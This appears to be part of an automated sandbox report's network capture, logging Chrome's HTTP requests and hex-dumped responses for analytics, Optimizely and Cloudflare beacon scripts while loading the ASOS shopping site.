                                                                                                                                                                                                                                                                  set-cookie: demdex=92169019881272936840057734661199256896; Max-Age=15552000; Expires=Sun, 27 Apr 2025 19:11:33 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                  2024-10-29 19:11:33 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  127192.168.2.1649963104.18.66.574437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC359OUTGET /js/19181552552.js HTTP/1.1
                                                                                                                                                                                                                                                                  Host: cdn.optimizely.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:35 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  x-amz-id-2: tcUXEl62QE86b8AqCd2GBzS3vwYXWu3sngC7icLc16AW6nWrDRpfjkmbmViiEfLJBCND2Q+ZmyqeQQYI1HuH8eE+W39R21nAypz3NB5N9ZE=
                                                                                                                                                                                                                                                                  x-amz-request-id: 9QDRG82WHAG81S5R
                                                                                                                                                                                                                                                                  x-amz-replication-status: PENDING
                                                                                                                                                                                                                                                                  Last-Modified: Tue, 29 Oct 2024 17:04:28 GMT
                                                                                                                                                                                                                                                                  ETag: W/"ec404a585ca2422434fcbc20227eeae2"
                                                                                                                                                                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                  Cache-Control: max-age=120
                                                                                                                                                                                                                                                                  x-amz-meta-revision: 73001
                                                                                                                                                                                                                                                                  x-amz-meta-pci_enabled: False
                                                                                                                                                                                                                                                                  x-amz-version-id: yUtjZ6OrsoVjK5mBCgbbumPPD0rvsHEO
                                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                  Age: 409
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: x-amz-meta-revision
                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                  Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8da578e83f022869-DFW
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC424INData Raw: 37 62 65 37 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 63 6c 69 65 6e 74 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 35 32 35 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 76 61 72 20 69 3b 21 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 75 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 63 3d 22 6f 62 6a 65 63 74 22 2c 73 3d 22 73 74 72 69 6e 67 22 2c 66 3d 22 6d 6f 64 65 6c 22 2c 6c 3d 22 6e 61 6d 65 22 2c 64 3d 22 74 79 70 65 22 2c 76 3d 22 76 65 6e 64 6f
                                                                                                                                                                                                                                                                  Data Ascii: 7be7/*! For license information please see client.min.js.LICENSE.txt */(function(){var __webpack_modules__={5251:function(n,t,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendo
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC1369INData Raw: 65 22 2c 52 3d 22 48 75 61 77 65 69 22 2c 43 3d 22 4c 47 22 2c 4e 3d 22 4d 69 63 72 6f 73 6f 66 74 22 2c 44 3d 22 4d 6f 74 6f 72 6f 6c 61 22 2c 4f 3d 22 4f 70 65 72 61 22 2c 78 3d 22 53 61 6d 73 75 6e 67 22 2c 4d 3d 22 53 68 61 72 70 22 2c 50 3d 22 53 6f 6e 79 22 2c 4c 3d 22 58 69 61 6f 6d 69 22 2c 55 3d 22 5a 65 62 72 61 22 2c 56 3d 22 46 61 63 65 62 6f 6f 6b 22 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 7b 7d 2c 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 74 5b 6e 5b 65 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3d 6e 5b 65 5d 3b 72 65 74 75 72 6e 20 74 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6e 3d 3d 3d 73 26 26 2d 31 21 3d 3d 7a 28 74 29 2e 69 6e
                                                                                                                                                                                                                                                                  Data Ascii: e",R="Huawei",C="LG",N="Microsoft",D="Motorola",O="Opera",x="Samsung",M="Sharp",P="Sony",L="Xiaomi",U="Zebra",V="Facebook",F=function(n){for(var t={},e=0;e<n.length;e++)t[n[e].toUpperCase()]=n[e];return t},B=function(n,t){return typeof n===s&&-1!==z(t).in
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC1369INData Raw: 70 65 72 61 20 5b 6d 6f 62 69 6c 65 74 61 62 5d 7b 33 2c 36 7d 29 5c 62 2e 2b 76 65 72 73 69 6f 6e 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6f 70 65 72 61 29 28 3f 3a 2e 2b 76 65 72 73 69 6f 6e 5c 2f 7c 5b 5c 2f 20 5d 2b 29 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 6c 2c 68 5d 2c 5b 2f 6f 70 69 6f 73 5b 5c 2f 20 5d 2b 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 22 4f 70 65 72 61 20 4d 69 6e 69 22 5d 5d 2c 5b 2f 5c 62 6f 70 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 4f 5d 5d 2c 5b 2f 28 6b 69 6e 64 6c 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6c 75 6e 61 73 63 61 70 65 7c 6d 61 78 74 68 6f 6e 7c 6e 65 74 66 72 6f 6e 74 7c 6a 61 73 6d 69 6e 65 7c 62 6c 61 7a 65 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c
                                                                                                                                                                                                                                                                  Data Ascii: pera [mobiletab]{3,6})\b.+version\/([-\w\.]+)/i,/(opera)(?:.+version\/|[\/ ]+)([\w\.]+)/i],[l,h],[/opios[\/ ]+([\w\.]+)/i],[h,[l,"Opera Mini"]],[/\bopr\/([\w\.]+)/i],[h,[l,O]],[/(kindle)\/([\w\.]+)/i,/(lunascape|maxthon|netfront|jasmine|blazer)[\/ ]?([\w\
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC1369INData Raw: 73 65 72 2f 69 5d 2c 5b 5b 6c 2c 22 33 36 30 20 42 72 6f 77 73 65 72 22 5d 5d 2c 5b 2f 28 6f 63 75 6c 75 73 7c 73 61 6d 73 75 6e 67 7c 73 61 69 6c 66 69 73 68 7c 68 75 61 77 65 69 29 62 72 6f 77 73 65 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 28 2e 2b 29 2f 2c 22 24 31 20 42 72 6f 77 73 65 72 22 5d 2c 68 5d 2c 5b 2f 28 63 6f 6d 6f 64 6f 5f 64 72 61 67 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 68 5d 2c 5b 2f 28 65 6c 65 63 74 72 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 20 73 61 66 61 72 69 2f 69 2c 2f 28 74 65 73 6c 61 29 28 3f 3a 20 71 74 63 61 72 62 72 6f 77 73 65 72 7c 5c 2f 28 32 30 5c 64 5c 64 5c 2e 5b 2d 5c 77 5c 2e 5d 2b 29 29 2f 69 2c 2f 6d 3f 28 71 71 62 72 6f 77 73 65 72
                                                                                                                                                                                                                                                                  Data Ascii: ser/i],[[l,"360 Browser"]],[/(oculus|samsung|sailfish|huawei)browser\/([\w\.]+)/i],[[l,/(.+)/,"$1 Browser"],h],[/(comodo_dragon)\/([\w\.]+)/i],[[l,/_/g," "],h],[/(electron)\/([\w\.]+) safari/i,/(tesla)(?: qtcarbrowser|\/(20\d\d\.[-\w\.]+))/i,/m?(qqbrowser
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC1369INData Raw: 6f 78 2f 69 5d 2c 5b 68 2c 5b 6c 2c 22 46 69 72 65 66 6f 78 20 52 65 61 6c 69 74 79 22 5d 5d 2c 5b 2f 65 6b 69 6f 68 66 2e 2b 28 66 6c 6f 77 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 73 77 69 66 74 66 6f 78 29 2f 69 2c 2f 28 69 63 65 64 72 61 67 6f 6e 7c 69 63 65 77 65 61 73 65 6c 7c 63 61 6d 69 6e 6f 7c 63 68 69 6d 65 72 61 7c 66 65 6e 6e 65 63 7c 6d 61 65 6d 6f 20 62 72 6f 77 73 65 72 7c 6d 69 6e 69 6d 6f 7c 63 6f 6e 6b 65 72 6f 72 7c 6b 6c 61 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5c 2b 5d 2b 29 2f 69 2c 2f 28 73 65 61 6d 6f 6e 6b 65 79 7c 6b 2d 6d 65 6c 65 6f 6e 7c 69 63 65 63 61 74 7c 69 63 65 61 70 65 7c 66 69 72 65 62 69 72 64 7c 70 68 6f 65 6e 69 78 7c 70 61 6c 65 6d 6f 6f 6e 7c 62 61 73 69 6c 69 73 6b 7c 77 61 74 65 72 66 6f 78 29 5c
                                                                                                                                                                                                                                                                  Data Ascii: ox/i],[h,[l,"Firefox Reality"]],[/ekiohf.+(flow)\/([\w\.]+)/i,/(swiftfox)/i,/(icedragon|iceweasel|camino|chimera|fennec|maemo browser|minimo|conkeror|klar)[\/ ]?([\w\.\+]+)/i,/(seamonkey|k-meleon|icecat|iceape|firebird|phoenix|palemoon|basilisk|waterfox)\
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC1369INData Raw: 63 6f 72 65 6d 65 64 69 61 5c 2f 5b 5c 77 5c 2e 5d 2b 20 5c 28 28 69 70 61 64 29 2f 69 2c 2f 5c 62 28 69 70 61 64 29 5c 64 5c 64 3f 2c 5c 64 5c 64 3f 5b 3b 5c 5d 5d 2e 2b 69 6f 73 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 6d 61 63 69 6e 74 6f 73 68 29 3b 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 5d 2c 5b 2f 5c 62 28 73 68 2d 3f 5b 61 6c 74 76 7a 5d 3f 5c 64 5c 64 5b 61 2d 65 6b 6d 5d 3f 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 4d 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 28 3f 3a 61 67 5b 72 73 5d 5b 32 33 5d 3f 7c 62 61 68 32 3f 7c 73 68 74 3f 7c 62 74 76 29 2d 61 3f 5b 6c 77 5d 5c 64 7b 32 7d 29 5c 62 28 3f 21 2e 2b 64 5c 2f 73 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 52 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 68 75 61 77 65 69 7c 68 6f 6e 6f 72
                                                                                                                                                                                                                                                                  Data Ascii: coremedia\/[\w\.]+ \((ipad)/i,/\b(ipad)\d\d?,\d\d?[;\]].+ios/i],[f,[v,I],[d,_]],[/(macintosh);/i],[f,[v,I]],[/\b(sh-?[altvz]?\d\d[a-ekm]?)/i],[f,[v,M],[d,m]],[/\b((?:ag[rs][23]?|bah2?|sht?|btv)-a?[lw]\d{2})\b(?!.+d\/s)/i],[f,[v,R],[d,_]],[/(?:huawei|honor
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC1369INData Raw: 6f 69 64 20 74 76 29 5c 77 2b 29 2f 69 2c 2f 5c 62 6c 67 2d 3f 28 5b 5c 64 5c 77 5d 2b 29 20 62 75 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 43 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 69 64 65 61 74 61 62 5b 2d 5c 77 20 5d 2b 29 2f 69 2c 2f 6c 65 6e 6f 76 6f 20 3f 28 73 5b 35 36 5d 30 30 30 5b 2d 5c 77 5d 2b 7c 74 61 62 28 3f 3a 5b 5c 77 20 5d 2b 29 7c 79 74 5b 2d 5c 64 5c 77 5d 7b 36 7d 7c 74 62 5b 2d 5c 64 5c 77 5d 7b 36 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4c 65 6e 6f 76 6f 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 6d 61 65 6d 6f 7c 6e 6f 6b 69 61 29 2e 2a 28 6e 39 30 30 7c 6c 75 6d 69 61 20 5c 64 2b 29 2f 69 2c 2f 6e 6f 6b 69 61 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5c 2e 5d 2a 29 2f 69 5d 2c 5b 5b 66 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 5b 76 2c 22 4e 6f 6b 69 61 22
                                                                                                                                                                                                                                                                  Data Ascii: oid tv)\w+)/i,/\blg-?([\d\w]+) bui/i],[f,[v,C],[d,m]],[/(ideatab[-\w ]+)/i,/lenovo ?(s[56]000[-\w]+|tab(?:[\w ]+)|yt[-\d\w]{6}|tb[-\d\w]{6})/i],[f,[v,"Lenovo"],[d,_]],[/(?:maemo|nokia).*(n900|lumia \d+)/i,/nokia[-_ ]?([-\w\.]*)/i],[[f,/_/g," "],[v,"Nokia"
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC1369INData Raw: 5b 61 62 5d 5b 31 2d 37 5d 2d 3f 5b 30 31 37 38 61 5d 5c 64 5c 64 3f 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 41 63 65 72 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 6d 5b 31 2d 35 5d 20 6e 6f 74 65 29 20 62 75 69 2f 69 2c 2f 5c 62 6d 7a 2d 28 5b 2d 5c 77 5d 7b 32 2c 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4d 65 69 7a 75 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 62 6c 61 63 6b 62 65 72 72 79 7c 62 65 6e 71 7c 70 61 6c 6d 28 3f 3d 5c 2d 29 7c 73 6f 6e 79 65 72 69 63 73 73 6f 6e 7c 61 63 65 72 7c 61 73 75 73 7c 64 65 6c 6c 7c 6d 65 69 7a 75 7c 6d 6f 74 6f 72 6f 6c 61 7c 70 6f 6c 79 74 72 6f 6e 29 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5d 2a 29 2f 69 2c 2f 28 68 70 29 20 28 5b 5c 77 20 5d 2b 5c 77 29 2f 69 2c 2f 28 61 73 75 73 29 2d 3f 28 5c 77 2b 29
                                                                                                                                                                                                                                                                  Data Ascii: [ab][1-7]-?[0178a]\d\d?)/i],[f,[v,"Acer"],[d,_]],[/droid.+; (m[1-5] note) bui/i,/\bmz-([-\w]{2,})/i],[f,[v,"Meizu"],[d,m]],[/(blackberry|benq|palm(?=\-)|sonyericsson|acer|asus|dell|meizu|motorola|polytron)[-_ ]?([-\w]*)/i,/(hp) ([\w ]+\w)/i,/(asus)-?(\w+)
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC1369INData Raw: 74 29 28 5c 77 7b 35 7d 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 44 72 61 67 6f 6e 20 54 6f 75 63 68 22 5d 2c 66 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 6e 73 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 49 6e 73 69 67 6e 69 61 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 28 6e 78 61 7c 6e 65 78 74 29 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 65 78 74 42 6f 6f 6b 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 78 74 72 65 6d 65 5c 5f 29 3f 28 76 28 31 5b 30 34 35 5d 7c 32 5b 30 31 35 5d 7c 5b 33 34 36 39 5d 30 7c 37 5b 30 35 5d 29 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 56 6f 69 63 65 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 6c 76 74 65 6c 5c 2d 29 3f 28 76 31 5b 31 32 5d 29 20 62 2f 69 5d 2c 5b 5b 76 2c
                                                                                                                                                                                                                                                                  Data Ascii: t)(\w{5}) b/i],[[v,"Dragon Touch"],f,[d,_]],[/\b(ns-?\w{0,9}) b/i],[f,[v,"Insignia"],[d,_]],[/\b((nxa|next)-?\w{0,9}) b/i],[f,[v,"NextBook"],[d,_]],[/\b(xtreme\_)?(v(1[045]|2[015]|[3469]0|7[05])) b/i],[[v,"Voice"],f,[d,m]],[/\b(lvtel\-)?(v1[12]) b/i],[[v,
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC1369INData Raw: 70 65 72 61 20 74 76 7c 74 76 3b 20 72 76 3a 29 5c 62 2f 69 5d 2c 5b 5b 64 2c 77 5d 5d 2c 5b 2f 28 6f 75 79 61 29 2f 69 2c 2f 28 6e 69 6e 74 65 6e 64 6f 29 20 28 5b 77 69 64 73 33 75 74 63 68 5d 2b 29 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 67 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 73 68 69 65 6c 64 29 20 62 75 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 76 69 64 69 61 22 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 70 6c 61 79 73 74 61 74 69 6f 6e 20 5b 33 34 35 70 6f 72 74 61 62 6c 65 76 69 5d 2b 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 50 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 5c 62 28 78 62 6f 78 28 3f 3a 20 6f 6e 65 29 3f 28 3f 21 3b 20 78 62 6f 78 29 29 5b 5c 29 3b 20 5d 2f 69 5d 2c 5b 66 2c 5b 76 2c 4e 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 28 70 65 62 62 6c 65 29 29 61 70 70
                                                                                                                                                                                                                                                                  Data Ascii: pera tv|tv; rv:)\b/i],[[d,w]],[/(ouya)/i,/(nintendo) ([wids3utch]+)/i],[v,f,[d,g]],[/droid.+; (shield) bui/i],[f,[v,"Nvidia"],[d,g]],[/(playstation [345portablevi]+)/i],[f,[v,P],[d,g]],[/\b(xbox(?: one)?(?!; xbox))[\); ]/i],[f,[v,N],[d,g]],[/((pebble))app


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  128192.168.2.1649964104.18.66.574437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC722OUTGET /client_storage/a19065870423.html HTTP/1.1
                                                                                                                                                                                                                                                                  Host: a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:35 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  CF-Ray: 8da578e8ad8cc86f-DFW
                                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                  Age: 552
                                                                                                                                                                                                                                                                  Cache-Control: max-age=120
                                                                                                                                                                                                                                                                  Last-Modified: Tue, 29 Oct 2024 17:04:08 GMT
                                                                                                                                                                                                                                                                  x-amz-id-2: FU6E+mzkd9MbMafh6pIGphUL3V1w0WKRlJ28vI6u2R8VZoUSBpjL7MffsPGgH8g5Yn/uEdXMPT0=
                                                                                                                                                                                                                                                                  x-amz-meta-pci_enabled: False
                                                                                                                                                                                                                                                                  x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                  x-amz-request-id: VP4YWHQ2059G82FS
                                                                                                                                                                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                  x-amz-version-id: 6T1j44opBFxsOoOHtA6.ggMw._s2VTYF
                                                                                                                                                                                                                                                                  Server-Timing: cfCacheStatus;desc="HIT"
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC745INData Raw: 36 38 62 0d 0a 0a 3c 73 63 72 69 70 74 3e 0a 0a 76 61 72 20 61 6c 6c 6f 77 65 64 4f 72 69 67 69 6e 73 20 3d 20 5b 5b 22 5e 68 74 74 70 73 3f 3a 2f 2f 28 2e 2b 5c 5c 2e 29 3f 61 73 6f 73 5c 5c 2e 63 6f 6d 24 22 2c 20 22 22 5d 2c 20 5b 22 5e 68 74 74 70 73 3f 3a 2f 2f 28 2e 2b 5c 5c 2e 29 3f 61 74 74 69 63 61 6e 64 62 75 74 74 6f 6e 5c 5c 2e 75 73 24 22 2c 20 22 22 5d 2c 20 5b 22 5e 68 74 74 70 73 3f 3a 2f 2f 28 2e 2b 5c 5c 2e 29 3f 61 73 6f 73 73 65 72 76 69 63 65 73 5c 5c 2e 63 6f 6d 24 22 2c 20 22 22 5d 2c 20 5b 22 5e 68 74 74 70 73 3f 3a 2f 2f 28 2e 2b 5c 5c 2e 29 3f 63 6d 73 5c 5c 2e 61 73 6f 73 61 70 70 73 5c 5c 2e 63 6f 6d 24 22 2c 20 22 22 5d 2c 20 5b 22 5e 68 74 74 70 73 3f 3a 2f 2f 28 2e 2b 5c 5c 2e 29 3f 68 74 74 70 73 3a 77 77 77 5c 5c 2e 61 73
                                                                                                                                                                                                                                                                  Data Ascii: 68b<script>var allowedOrigins = [["^https?://(.+\\.)?asos\\.com$", ""], ["^https?://(.+\\.)?atticandbutton\\.us$", ""], ["^https?://(.+\\.)?asosservices\\.com$", ""], ["^https?://(.+\\.)?cms\\.asosapps\\.com$", ""], ["^https?://(.+\\.)?https:www\\.as
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC937INData Raw: 3d 21 31 3b 66 6f 72 28 6f 3d 30 3b 6f 3c 61 6c 6c 6f 77 65 64 4f 72 69 67 69 6e 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 69 66 28 76 28 65 2e 6f 72 69 67 69 6e 2c 61 6c 6c 6f 77 65 64 4f 72 69 67 69 6e 73 5b 6f 5d 29 29 7b 73 3d 21 30 3b 62 72 65 61 6b 7d 69 66 28 73 29 66 6f 72 28 6f 3d 30 3b 6f 3c 62 6c 6f 63 6b 65 64 4f 72 69 67 69 6e 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 69 66 28 76 28 65 2e 6f 72 69 67 69 6e 2c 62 6c 6f 63 6b 65 64 4f 72 69 67 69 6e 73 5b 6f 5d 29 29 7b 30 2c 73 3d 21 31 3b 62 72 65 61 6b 7d 69 66 28 73 29 7b 63 3d 65 3b 74 72 79 7b 69 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 65 2e 64 61 74 61 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 7d 69 66 28 74 3d 65 2e 6f 72 69 67 69 6e 2b 22 5f 22 2b 69 2e 6b 65 79 2c
                                                                                                                                                                                                                                                                  Data Ascii: =!1;for(o=0;o<allowedOrigins.length;o++)if(v(e.origin,allowedOrigins[o])){s=!0;break}if(s)for(o=0;o<blockedOrigins.length;o++)if(v(e.origin,blockedOrigins[o])){0,s=!1;break}if(s){c=e;try{i=JSON.parse(e.data)}catch(e){return void 0}if(t=e.origin+"_"+i.key,
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC480INData Raw: 31 64 39 0d 0a 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 63 64 31 35 63 62 65 37 37 37 32 66 34 39 63 33 39 39 63 36 61 35 62 61 62 66 32 32 63 31 32 34 31 37 31 37 36 38 39 31 37 36 30 31 35 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 5a 70 73 4f 6d 6c 52 51 56 36 79 39 30 37 54 49 30 64 4b 42 48 71 39 4d 64 32 39 6e 6e 61 45 49 50 6c 6b 66 38 34 72 6e 61 45 52 6e 71 36 7a 76 57 76 50 55 71 72 32 66 74 38 4d 31 61 53 32 38 6f 4e 37 32 50 64 72 43 7a 53 6a 59 34 55 36 56 61 41 77 31 45 51 3d 3d 22 20 64 61 74 61 2d 63 66 2d 62 65 61 63 6f 6e 3d 27 7b 22 72 61 79 49 64
                                                                                                                                                                                                                                                                  Data Ascii: 1d9<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId
                                                                                                                                                                                                                                                                  2024-10-29 19:11:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  129192.168.2.1649965104.16.79.734437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC650OUTGET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1
